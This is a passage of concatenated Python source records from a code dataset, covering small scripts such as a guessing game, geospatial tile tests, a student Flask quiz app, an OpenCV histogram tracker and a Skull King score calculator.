pd.DataFrame(filter_hemisphere, columns=['subject', 'electrode'])\n    df2.to_csv('post_fdr_lh.csv', index=False, columns=['subject', 'electrode'])\n\n# phase-1000-sig-elec-glove50d-perElec-FDR-01-LH-hg","sub_path":"code/podenc_sigelec_fdr.py","file_name":"podenc_sigelec_fdr.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358584467","text":"def US_28(self):\n    result = []\n    temp=[]\n    p=[]\n    for key, family in self._family.items():\n        result1 = []\n        list_children = family._children\n        if list_children != \"NA\":\n            for child in list_children:\n                result1.append(self._individual[child])\n            result1.sort(key=lambda x: x._age, reverse=False)\n            if len(result1)>1:\n                result.append(\"List of siblings\" +family._family+ \"after sorting is\")\n                for child in result1:\n                    if child._age >= 0:\n                        temp.append(str(len(str(child._age)))+\" \"+str(child._age)+\" :- \"+child._name +\" from FamID \"+family._family)\n            temp=list(set(temp))\n            for _ in sorted(temp,reverse=True):\n                x=_.split(\" \")\n                y=\" \".join(map(str,x[1:]))\n                p.append(y)\n    return sorted(p,reverse=True)\n","sub_path":"US_28.py","file_name":"US_28.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"179016277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 22 18:07:51 2014\n\n@author: Guillaume\n\"\"\"\n\nalph = \"abcdefghijklmnopqrstuvwxyz\"\nlettre = list(alph)\nfor i in range(0, 26):\n    for j in range(0, 26):\n        print(lettre[i], lettre[j], \"\\n\")\n","sub_path":"exercices/060/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599916729","text":"#Sayı tahmin oyunu\nimport random\nimport time\n\ndenemeSayisi = 1\nprint(\"Sayı tahmin oyununa hoşgeldiniz.\")\n\n\nwhile True:\n    while True:\n        answer = input(\"Yeni oyuna başla ? 
(y/n) : \")\n if(answer == 'y' or answer == 'n'):\n break\n else:\n print(\"Lütfen sadece y yada n harflerinden birini giriniz\")\n \n if(answer == 'n'):\n print(\"Katıldığınız için teşekkürler.\")\n exit()\n \n rsayi = random.randint(0,100)\n print(\"Sayınız oluşturuldu.\")\n \n startTime = time.time()\n\n while (answer == 'y'):\n cevap = int(input(\"Cevabınız : \"))\n if(cevap == rsayi):\n print(\"Tebrikler cevabınız doğru.\",end = ' ')\n break\n elif(cevap > rsayi):\n print(\"Sayıdan büyüktür.\")\n else:\n print(\"Sayidan küçüktür.\")\n denemeSayisi += 1\n\n endTime = time.time()\n print(f\"Tahmin süreniz {round((endTime-startTime),2)} saniyedir. Deneme sayınız : {denemeSayisi}\")\n","sub_path":"Python uygulamaları/sayiTahminOyunu.py","file_name":"sayiTahminOyunu.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"226186024","text":"import pytest\nfrom unittest import TestCase\nimport numpy as np\n\nfrom ..tile import Tile, Grid\nfrom ..exceptions import (\n InvalidLatLonError,\n InvalidRowColError,\n InvalidTileError,\n InvalidShapeError,\n)\n\n\nclass TileTest(TestCase):\n \"\"\"Tests Tile class\"\"\"\n\n def test_from_key_1(self):\n key = '2048:16:30.2:15:3:80'\n tile = Tile.from_key(key)\n assert tile.key == key\n assert tile.zone == 15\n assert tile.resolution == 30.2\n assert tile.tilesize == 2048\n assert tile.path == 3\n assert tile.row == 80\n\n def test_from_key_2(self):\n key = '2048:16:30:15:-5:15' # no decimal in key\n tile = Tile.from_key(key)\n assert tile.key == '2048:16:30.0:15:-5:15' # decimal included\n assert tile.resolution == 30\n assert tile.path == -5\n assert tile.row == 15\n\n def test_get_invalid_dlkey_1(self):\n invalid_key = \"2048:16:30.0:0:3:80\" # tilesize must be greater than zero\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_get_invalid_dlkey_2(self):\n invalid_key = \"blah:16:30.0:1:3:80\" # invalid type\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_get_invalid_dlkey_3(self):\n invalid_key = \"2048:16.4:30.0:15:3:80\" # pad must be int\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_dlkeys_subtile(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 8\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n tiles = [t for t in tile.subtile(sub)]\n assert len(tiles) == sub * sub\n for t in tiles:\n assert t.tilesize == params[\"tilesize\"] // sub\n\n def test_dlkeys_subtile_with_params(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n new_resolution = 2\n new_pad = 13\n sub = 4\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n tiles = [t for t in tile.subtile(sub, new_resolution=new_resolution, new_pad=new_pad)]\n assert len(tiles) == sub * sub\n for t in tiles:\n assert np.allclose(\n t.tilesize * new_resolution * sub,\n params[\"tilesize\"] * params[\"resolution\"]\n )\n assert t.pad == new_pad\n assert t.resolution == new_resolution\n\n def test_dlkeys_subtile_error_1(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 11 # does not evenly divide tilesize\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n with pytest.raises(InvalidTileError):\n [t for t in tile.subtile(sub)]\n\n def test_dlkeys_subtile_error_2(self):\n params = {\n 
\"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 8\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n with pytest.raises(InvalidTileError):\n [t for t in tile.subtile(sub, new_resolution=13)] # does not divide\n\n def test_rowcol_conversions(self):\n # get a polar tile\n tile = Grid(tilesize=1000, resolution=1000, pad=0).tile_from_lonlat(lon=0.0, lat=90.0)\n x, y = 567, 133\n lon, lat = tile.rowcol_to_lonlat(x, y)\n row, col = tile.lonlat_to_rowcol(lon, lat)\n assert row == x\n assert col == y\n\n def test_invalid_rowcol(self):\n tile = Grid(tilesize=1000, resolution=1000, pad=0).tile_from_lonlat(lon=0.0, lat=90.0)\n x, y = [1, 1, 2, 3, 5], [42]\n with pytest.raises(InvalidRowColError):\n lon, lat = tile.rowcol_to_lonlat(x, y)\n\n def test_assign(self):\n tile1 = Tile.from_key(\"2048:16:0.2:15:3:80\")\n assert tile1.resolution == 0.2\n tile2 = tile1.assign(resolution=1)\n assert tile2.resolution == 1\n assert tile1.pad == tile2.pad\n assert tile1.tilesize == tile2.tilesize\n\n def test_bad_assign(self):\n tile1 = Tile.from_key(\"2048:16:0.2:15:3:80\")\n with pytest.raises(InvalidTileError):\n # incompatible resolution and tilesize\n tile1.assign(resolution=1, tilesize=512)\n\n\nclass GridTest(TestCase):\n \"\"\"Tests Grid class\"\"\"\n\n def test_make_invalid_grid(self):\n with pytest.raises(InvalidTileError):\n Grid(tilesize=0, resolution=1000, pad=0)\n\n def test_from_latlon(self):\n params = {\n \"tilesize\": 1,\n \"resolution\": 1.5,\n \"pad\": 99\n }\n lat, lon = (61.91, 5.26)\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n assert tile.tilesize == params[\"tilesize\"]\n assert tile.pad == params[\"pad\"]\n assert tile.tile_extent == params[\"tilesize\"] + 2 * params[\"pad\"]\n assert np.allclose(\n [\n tile.polygon.centroid.xy[0][0],\n tile.polygon.centroid.xy[1][0],\n ],\n [lon, lat]\n )\n\n def test_dlkeys_from_invalid_latlon(self):\n lat, lon = -97.635, 212.723\n params = {\"resolution\": 60.0, \"tilesize\": 512, \"pad\": 0}\n with pytest.raises(InvalidLatLonError):\n Grid(**params).tile_from_lonlat(0, lat)\n with pytest.raises(InvalidLatLonError):\n Grid(**params).tile_from_lonlat(lon, 0)\n\n def test_tiles_from_shape_1(self):\n params = {\n \"resolution\": 10,\n \"tilesize\": 2048,\n \"pad\": 16,\n }\n shape = \"\"\"{\"coordinates\":\n [[[-90.1897158, 44.2267595],\n [-87.9570052, 43.8067829],\n [-88.5766841, 42.1269533],\n [-90.7457357, 42.5435965],\n [-90.1897158, 44.2267595]]],\n \"type\": \"Polygon\"}\"\"\"\n\n grid = Grid(**params)\n gen = grid.tiles_from_shape(shape)\n tiles = [tile for tile in gen]\n assert len(tiles) == len(set(tiles))\n assert len(tiles) == 115\n\n est_ntiles = grid._estimate_ntiles_from_shape(shape)\n assert len(tiles) > (est_ntiles // 2)\n assert len(tiles) < (est_ntiles * 2)\n\n def test_tiles_from_shape_2(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 128,\n \"pad\": 8,\n }\n shape = {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [-122.51140471760839, 37.77130087547876],\n [-122.45475646845254, 37.77475476721895],\n [-122.45303985468301, 37.76657207194229],\n [-122.51057242081689, 37.763446782666094],\n [-122.51140471760839, 37.77130087547876]]\n ]},\n \"properties\": None\n }\n\n grid = Grid(**params)\n gen = Grid(**params).tiles_from_shape(shape)\n tiles = [tile for tile in gen]\n assert len(tiles) == len(set(tiles))\n assert len(tiles) == 325\n\n est_ntiles = grid._estimate_ntiles_from_shape(shape)\n assert len(tiles) > 
(est_ntiles // 2)\n assert len(tiles) < (est_ntiles * 2)\n\n def test_dlkeys_from_invalid_shape(self):\n params = {\n \"resolution\": 30,\n \"tilesize\": 2048,\n \"pad\": 16,\n }\n shape = {\n \"type\": \"Point\",\n \"coordinates\": [\n -105.01621,\n 39.57422\n ]\n }\n with pytest.raises(InvalidShapeError):\n for t in Grid(**params).tiles_from_shape(shape):\n pass\n","sub_path":"descarteslabs/common/dltile/tests/test_dltiles.py","file_name":"test_dltiles.py","file_ext":"py","file_size_in_byte":7916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"8226816","text":"from flask import (Flask, render_template, redirect,\n session, url_for, request, g)\nfrom markupsafe import escape\n# from db import get_db\n# import os\nimport sqlite3\n\n\napp = Flask(__name__)\n# dbhere = os.path.join(app.instance_path, 'hw13.db')\n# Configure app, and displays database path\napp.config.from_mapping(\n SECRET_KEY='ultrastrongkey',\n # DATABASE=dbhere\n )\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect('hw13.db')\n db.row_factory = sqlite3.Row\n return db\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close\n\n\n@app.before_request\ndef before_request():\n g.db = get_db()\n\n\n# Initializes and gets db\nwith app.app_context():\n db = get_db()\n\n\n@app.route('/')\ndef index():\n if 'username' in session:\n return \"\"\"Logged in as {}\n

    <a href=\"/dashboard\">Dashboard</a>\n    \n \"\"\".format(escape(session['username']))\n    return '''You are not logged in.\n    <a href=\"/login\">Login</a>\n
    \n '''\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n session['username'] = request.form['username']\n username = request.form['username']\n password = request.form['password']\n if username == 'admin' and password == 'password':\n return redirect(url_for('dashboard'))\n else:\n logout()\n return redirect(url_for('login'))\n else:\n return render_template('login.html')\n\n\n@app.route('/logout')\ndef logout():\n session.pop('username', None)\n return redirect(url_for('index'))\n\n\n@app.route('/dashboard', methods=['GET'])\ndef dashboard():\n if session['username'] == 'admin':\n if request.method == 'GET':\n studret = g.db.execute(\"SELECT * FROM students\").fetchall()\n quizret = g.db.execute(\"SELECT * FROM quizzes\").fetchall()\n\n # studlist = [\n # dict(First=r['firstname'],\n # Last=r['lastname'],\n # Studentid=r['id']) for r in studret\n # ]\n # quizzes = [\n # dict(quizid=quizret[0],\n # subject=quizret[1],\n # qs=quizret[2],\n # date=quizret[3])\n # ]\n\n return render_template('dashboard.html', students=studret,\n quizzes=quizret)\n return redirect(url_for('index'))\n\n\n@app.route('/student/add', methods=['GET', 'POST'])\ndef studentadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('studentadd.html')\n if request.method == 'POST':\n try:\n addstu = (request.form[\"fname\"], request.form['lname'])\n g.db.execute(\"\"\"INSERT INTO students (firstname, lastname)\n VALUES (?, ?);\"\"\", (addstu),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('studentadd.html')\n\n\n@app.route('/quiz/add', methods=['GET', 'POST'])\ndef quizadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('quizadd.html')\n if request.method == 'POST':\n try:\n addqui = (request.form[\"subject\"], request.form['qs'],\n request.form['date'])\n g.db.execute(\"\"\"INSERT INTO quizzes (subject, qs, date)\n VALUES (?, ?, ?);\"\"\", (addqui),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('quizadd.html')\n\n\n@app.route('/student/')\ndef quizscore(id):\n qscr = g.db.execute(\"\"\"\n SELECT quizzes.id, student_result.grade, quizzes.date\n FROM students JOIN student_result ON students.id =\n student_result.studentid\n JOIN quizzes ON student_result.quizid = quizzes.id\n WHERE students.id = ?\n \"\"\", [id]).fetchall()\n\n return render_template('studentscore.html', qscr=qscr)\n\n\n@app.route('/result/add', methods=['GET', 'POST'])\ndef resultadd():\n if session['username'] == 'admin':\n if request.method == 'GET':\n return render_template('resultadd.html')\n if request.method == 'POST':\n try:\n resultqui = (request.form[\"studentid\"], request.form['quizid'],\n request.form['grade'])\n g.db.execute(\"\"\"\n INSERT INTO student_result\n (studentid, quizid, grade)\n VALUES (?, ?, ?);\"\"\", (resultqui),\n )\n g.db.commit()\n return redirect(url_for('dashboard'))\n except Exception as e:\n print(e)\n return render_template('resultadd.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"635531208","text":"from flask import Flask\nfrom flask import render_template\nfrom pymongo import MongoClient\nimport json\nimport os\n\n\napp = 
Flask(__name__)\n\nCOLLECTION_NAME = 'project2'\nMONGO_URI = os.getenv('MONGODB_URI')\nDBS_NAME = os.getenv('MONGO_DB_NAME')\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/data\")\ndef project():\n \"\"\"\n A Flask view to serve the googlePlay data from\n MongoDB in JSON format.\n \"\"\"\n\n # A constant that defines the record fields that we wish to retrieve.\n FIELDS = {\n '_id': False, 'Rating': False, 'Android Ver': False, 'Type': False, 'Current Ver': False\n }\n\n # Open a connection to MongoDB using a with statement such that the\n # connection will be closed as soon as we exit the with statement\n with MongoClient(MONGO_URI) as conn:\n # Define which collection we wish to access\n collection = conn[DBS_NAME][COLLECTION_NAME]\n # Retrieve a result set only with the fields defined in FIELDS\n projects = collection.find(projection=FIELDS, limit=2000)\n # Convert projects to a list in a JSON object and return the JSON data\n return json.dumps(list(projects))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"Stream2_project.py","file_name":"Stream2_project.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87093749","text":"\"\"\"\nCreated by 陈辰柄\ndatetime:2020/4/15 2:38\nDescribe: reflect the existing database schema via SQLAlchemy automap\n\"\"\"\n\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy import inspect,insert,create_engine\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import select, func\n\nBase = automap_base()\n\n\n\nengine = create_engine('sqlite:///Chinook_Sqlite.sqlite')\nmysql_engine = create_engine(\"mysql+mysqlconnector://root:@localhost:3306/guest\", pool_recycle=3600)\nBase.prepare(engine, reflect=True)\n\nBase.metadata.create_all(mysql_engine)\n\nArtist = Base.classes.Artist\nAlbum = Base.classes.Album\n\n\nsqlite_session = Session(engine)\nmysql_session = Session(mysql_engine)\n\n\ndef print_state(object):\n insp = inspect(object)\n for state in ['transient', 'pending', 'persistent', 'detached']:\n print('{:>10}: {}'.format(state, getattr(insp, state)))\n print()\n\n\nnums_sql = select([func.count(Artist.Name)])\nselect_Sql = select([Artist])\n\nconnection = engine.connect()\nmysql_connection = mysql_engine.connect()\n\nnums = connection.execute(nums_sql).first().count_1\nprint(nums)\n\nfor i in range(0, nums, 10):\n # select_Sql = select_Sql.slice(i, i + 1000).all()\n select_Sql = select_Sql.offset(i).limit(10)\n results = connection.execute(select_Sql)\n list_results=[tuple(i) for i in results]\n print(list_results)\n ins = insert(Artist).values(list_results)\n mysql_connection.execute(ins)\n","sub_path":"chapter_ten/chapter_ten.py","file_name":"chapter_ten.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459305118","text":"import cv2\nimport numpy as np\n\n\ndef my_divHist(fr):\n\n y, x = fr.shape[0], fr.shape[1]\n div = 3\n divY, divX = y // div, x // div\n\n hist = []\n for i in range(div):\n for j in range(div):\n if(div == 2):\n fr_Blue = fr[i * divY: y, j * divX: x, 0].flatten()\n fr_Green = fr[i * divY: y, j * divX: x, 1].flatten()\n fr_Red = fr[i * divY: y, j * divX: x, 2].flatten()\n\n else :\n fr_Blue = fr[i * divY:(i + 1) * divY, j * divX: (j + 1) * divX, 0].flatten()\n fr_Green = fr[i * divY:(i + 1) * divY, j * divX:(j + 1) * divX, 1].flatten()\n fr_Red = fr[i * divY:(i + 1) * 
divY, j * divX:(j + 1) * divX, 2].flatten()\n\n fr_Blue = (fr_Blue / 32).astype(np.int64)\n fr_Green = (fr_Green / 32).astype(np.int64)\n fr_Red = (fr_Red / 32).astype(np.int64)\n\n fr_Blue_hist = np.bincount(fr_Blue, minlength=8)\n fr_Green_hist = np.bincount(fr_Green, minlength=8)\n fr_Red_hist = np.bincount(fr_Red, minlength=8)\n\n hist = np.concatenate((hist,fr_Blue_hist, fr_Green_hist, fr_Red_hist), axis=0)\n\n return hist\n\ndef my_hist(fr):\n\n fr_Blue = fr[:, :, 0].flatten()\n fr_Green = fr[:, :, 1].flatten()\n fr_Red = fr[:, :, 2].flatten()\n\n fr_Blue =(fr_Blue/32).astype(np.int64)\n fr_Green =(fr_Green/32).astype(np.int64)\n fr_Red = (fr_Red/32).astype(np.int64)\n\n fr_Blue_hist = np.bincount(fr_Blue, minlength=8)\n fr_Green_hist = np.bincount(fr_Green, minlength=8)\n fr_Red_hist = np.bincount(fr_Red, minlength=8)\n\n hist = np.concatenate((fr_Blue_hist, fr_Green_hist, fr_Red_hist), axis=0)\n return hist\n\ndef get_minDist(src, target, start):\n\n sy, sx = src.shape[0], src.shape[1]\n ty, tx = target.shape[0], target.shape[1]\n min_dist = 10000000\n offset_y = start[0] if start[0] < sy-ty-20 else sy-ty-20\n offset_x = start[1] if start[1] < sx-tx-20 else sx-tx-20\n coord = (0,0,0,0)\n # the template histogram never changes, so compute it once outside the search loop\n target_hist = my_hist(target[0:ty,0:tx])\n\n for i in range(offset_y-20, offset_y+20):\n for j in range(offset_x-20, offset_x+20):\n\n src_hist = my_hist(src[i:i+ty,j:j+tx])\n\n square_dis = [(src_value - target_value)**2 for (src_value,target_value) in zip(src_hist, target_hist)]\n sum_list = [src_value + target_value for (src_value,target_value) in zip(src_hist, target_hist)]\n hist_distance = np.sum([square_value / sum_value for (square_value,sum_value) in zip(square_dis, sum_list) if sum_value != 0.])\n\n if (hist_distance < min_dist):\n coord = (j, i, j + tx, i + ty)\n min_dist = hist_distance\n\n return coord\n\nroi = None\ndrag_start = None\nmouse_status = 0\ntracking_start = False\n\ndef onMouse(event, x, y, flags, param=None):\n global roi\n global drag_start\n global mouse_status\n global tracking_start\n if event == cv2.EVENT_LBUTTONDOWN:\n drag_start = (x,y)\n mouse_status = 1\n tracking_start = True\n elif event == cv2.EVENT_MOUSEMOVE:\n if flags == cv2.EVENT_FLAG_LBUTTON:\n xmin = min(x, drag_start[0])\n ymin = min(y, drag_start[1])\n xmax = max(x, drag_start[0])\n ymax = max(y, drag_start[1])\n roi = (xmin, ymin, xmax, ymax)\n mouse_status = 2\n elif event == cv2.EVENT_LBUTTONUP:\n mouse_status = 3\n\ncv2.namedWindow('tracking')\ncv2.setMouseCallback('tracking', onMouse)\ncap = cv2.VideoCapture('vtest.mp4')\nif not cap.isOpened():\n print('Error opening video')\nh, w = (int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)), int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)))\n\nfilename = 'tracking_video.avi'\nfps = cap.get(cv2.CAP_PROP_FPS)\nfourcc = cv2.VideoWriter_fourcc(*'DIVX')\nout = cv2.VideoWriter(filename, fourcc, fps, (int(w), int(h)))\n\nfr_roi = None\nwhile True:\n ret, frame = cap.read()\n if not ret:\n break\n\n if fr_roi is not None:\n x1,y1,x2,y2 = get_minDist(frame, fr_roi, start)\n start = (y1,x1)\n cv2.rectangle(frame,(x1,y1), (x2,y2), (255, 0,0), 2)\n if mouse_status == 2:\n x1,y1,x2,y2 = roi\n cv2.rectangle(frame, (x1,y1), (x2,y2), (255,0,0), 2)\n if mouse_status == 3:\n mouse_status = 0\n x1, y1, x2, y2 = roi\n start = (y1,x1)\n fr_roi = frame[y1:y2, x1:x2]\n\n cv2.imshow('tracking', frame)\n out.write(frame)\n key = cv2.waitKey(100)\n if key == ord('c'):\n break\nif cap.isOpened():\n 
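# added note (not in the original): releasing the capture and the writer lets\n # OpenCV flush buffered frames and finalize the AVI container; without\n # out.release() the written index can be incomplete and the file may not play.\n 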
cap.release()\nout.release()\ncv2.destroyAllWindows()","sub_path":"my_hist for student.py","file_name":"my_hist for student.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519987080","text":"import time\r\nimport os\r\n\r\n# Global variables\r\ngameComplete = \"n\" \r\nnumPlayersValid = \"n\"\r\nplayerNameList = []\r\nnumRounds = 10\r\nscoringComplete = 'n'\r\ncurrentRound = 1\r\nplayerScoreList = [0,0,0,0,0,0]\r\n\r\n# Print application banner information\r\nprint('Welcome to the Skull King Calculator')\r\nprint('Version 2.2')\r\nprint('Created by Tim Chaffin')\r\nprint('')\r\ntime.sleep(1)\r\n\r\n# User input section\r\nwhile gameComplete == \"n\":\r\n os.system('clear')\r\n score = 0\r\n \r\n while numPlayersValid == \"n\":\r\n print(\"How many players are playing?\")\r\n while True:\r\n try:\r\n numPlayers = int(input())\r\n except ValueError:\r\n print(\"Invalid number, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n if numPlayers > 6:\r\n print(\"You can only have a maximum of 6 players.\")\r\n numPlayersValid = \"n\"\r\n elif numPlayers < 2:\r\n print(\"You must have at least 2 players\")\r\n numPlayersValid = \"n\"\r\n else:\r\n numPlayersValid = \"y\"\r\n \r\n numNames = numPlayers\r\n os.system('clear')\r\n enterPlayerNum = 1\r\n \r\n while numNames > 0:\r\n print(\"Enter the name for player number\",enterPlayerNum,\":\")\r\n while True:\r\n try:\r\n playerName = input()\r\n except ValueError:\r\n print(\"Invalid input for player name, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n playerNameList.append(playerName)\r\n numNames = numNames - 1\r\n enterPlayerNum = enterPlayerNum + 1\r\n print(\"\")\r\n \r\n os.system('clear')\r\n currentRound = 1\r\n \r\n while currentRound <= numRounds:\r\n \r\n bidsTaken = numPlayers\r\n bidsPrinted = 0\r\n scoresPrinted = 0\r\n currentPlayerGuess = 0\r\n playerBids = []\r\n roundScored = 'f'\r\n \r\n print('Round Number:',currentRound)\r\n print('')\r\n print('Score Summary')\r\n if currentRound == 1:\r\n print('-First Round, No Scores Yet-') \r\n else:\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n print(\"\")\r\n \r\n while bidsTaken > 0:\r\n print(\"Please enter the player bid count for\",playerNameList[currentPlayerGuess],\":\")\r\n while True:\r\n try:\r\n currentPlayerBid = int(input())\r\n except ValueError:\r\n print(\"Invalid input for bid count, try again.\")\r\n continue\r\n else:\r\n break\r\n \r\n playerBids.append(currentPlayerBid)\r\n currentPlayerGuess = currentPlayerGuess + 1\r\n bidsTaken = bidsTaken - 1\r\n print(\"\")\r\n \r\n os.system('clear')\r\n \r\n print('Round Number:',currentRound)\r\n print('')\r\n print('Bid Summary')\r\n while bidsPrinted <= (numPlayers-1): \r\n print(playerNameList[bidsPrinted],':',playerBids[bidsPrinted])\r\n bidsPrinted = bidsPrinted + 1\r\n print('')\r\n print('Score Summary')\r\n if currentRound == 1:\r\n print('-First Round, No Scores Yet-') \r\n else:\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n \r\n currentPlayerScored = 0\r\n \r\n while roundScored == 'f':\r\n print(\"\")\r\n print(\"Please enter the number of tricks won by\",playerNameList[currentPlayerScored],\":\")\r\n while 
True:\r\n try:\r\n currentPlayerTrick = int(input())\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if playerBids[currentPlayerScored] == 0:\r\n if currentPlayerTrick > 0:\r\n score = currentRound*-10\r\n print(playerNameList[currentPlayerScored],\"bid 0, with\", currentRound,\"card(s) dealt this round.\",playerNameList[currentPlayerScored],\"won one or more tricks. \",playerNameList[currentPlayerScored],\"loses\",abs(score), \"points.\")\r\n elif currentPlayerTrick == 0:\r\n score = currentRound*10\r\n print(playerNameList[currentPlayerScored],\"won\", score, \"points.\")\r\n elif playerBids[currentPlayerScored] > 0:\r\n if currentPlayerTrick == playerBids[currentPlayerScored]:\r\n score = playerBids[currentPlayerScored]*20 \r\n print(\"\")\r\n print(playerNameList[currentPlayerScored],\"won their bid\")\r\n print(\"\")\r\n print(playerNameList[currentPlayerScored],\"may earn bonus points by winning a trick in which three particular cards have been played.\") \r\n print('Was either the 14 of Yellow, 14 of Black or the Skull King Played? y/n')\r\n while True:\r\n try:\r\n bonusCards = input()\r\n if bonusCards not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue \r\n else:\r\n break \r\n if bonusCards in('y','Y'):\r\n print(\"Was the 14 of yellow card won? y/n\")\r\n while True: \r\n try:\r\n yellowCardWon = input()\r\n if yellowCardWon not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break \r\n if yellowCardWon in('y','Y'):\r\n score = score + 10\r\n print(\"Was the 14 of black card won? y/n\")\r\n while True:\r\n try:\r\n blackCardWon = input()\r\n if blackCardWon not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if blackCardWon in('y','Y'):\r\n score = score + 20 \r\n print(\"Was the Skull King played? 
y/n\")\r\n while True:\r\n try:\r\n skullKing = input()\r\n if skullKing not in('y','Y','n','N'):\r\n raise ValueError('Not a valid choice')\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break\r\n if skullKing in('y','Y'):\r\n print(\"\")\r\n print(\"The skull king scores a bonus of 30 points for every pirate card that was played in the same trick prior to the Skull King being played.\")\r\n print(\"How many pirate cards were played prior to the Skull King being played?\")\r\n while True:\r\n try:\r\n skullKingKilledPirates = int(input())\r\n except ValueError:\r\n print(\"Invalid input, try again.\")\r\n continue\r\n else:\r\n break \r\n if skullKingKilledPirates == 0:\r\n print(\"The Skull King did not take any pirate cards, and no bonus points are rewarded.\") \r\n elif skullKingKilledPirates > 0:\r\n score = score + skullKingKilledPirates*30 \r\n \r\n print(playerNameList[currentPlayerScored],\"won\", score, \"points\") \r\n else:\r\n score = ((playerBids[currentPlayerScored]-currentPlayerTrick)*10)*-1\r\n print(playerNameList[currentPlayerScored],\"lost\", abs(score), \"points\") \r\n \r\n playerScoreList[currentPlayerScored] = playerScoreList[currentPlayerScored]+score\r\n \r\n if currentPlayerScored == (numPlayers-1): \r\n roundScored = 't'\r\n else: \r\n currentPlayerScored = currentPlayerScored + 1\r\n print(\"\") \r\n \r\n print('Press Any Key To Continue:')\r\n waitForaBit = input()\r\n \r\n currentRound = currentRound + 1\r\n os.system('clear')\r\n \r\n print('Final Score Summary')\r\n scoresPrinted = 0\r\n while scoresPrinted <= (numPlayers-1):\r\n print(playerNameList[scoresPrinted],\":\",playerScoreList[scoresPrinted])\r\n scoresPrinted = scoresPrinted + 1\r\n gameComplete = 'y'","sub_path":"skullKingCalc.py","file_name":"skullKingCalc.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435511356","text":"import numpy as np\n\n\nclass GlobalAlignment:\n def __init__(self, string1, string2, gap_penalty, matrix):\n \"\"\"\n :param string1: first string to be aligned, string\n :param string2: second string to be aligned, string\n :param gap_penalty: gap penalty, integer\n :param matrix: substitution matrix containing scores for amino acid\n matches and mismatches, dict\n\n Attention! 
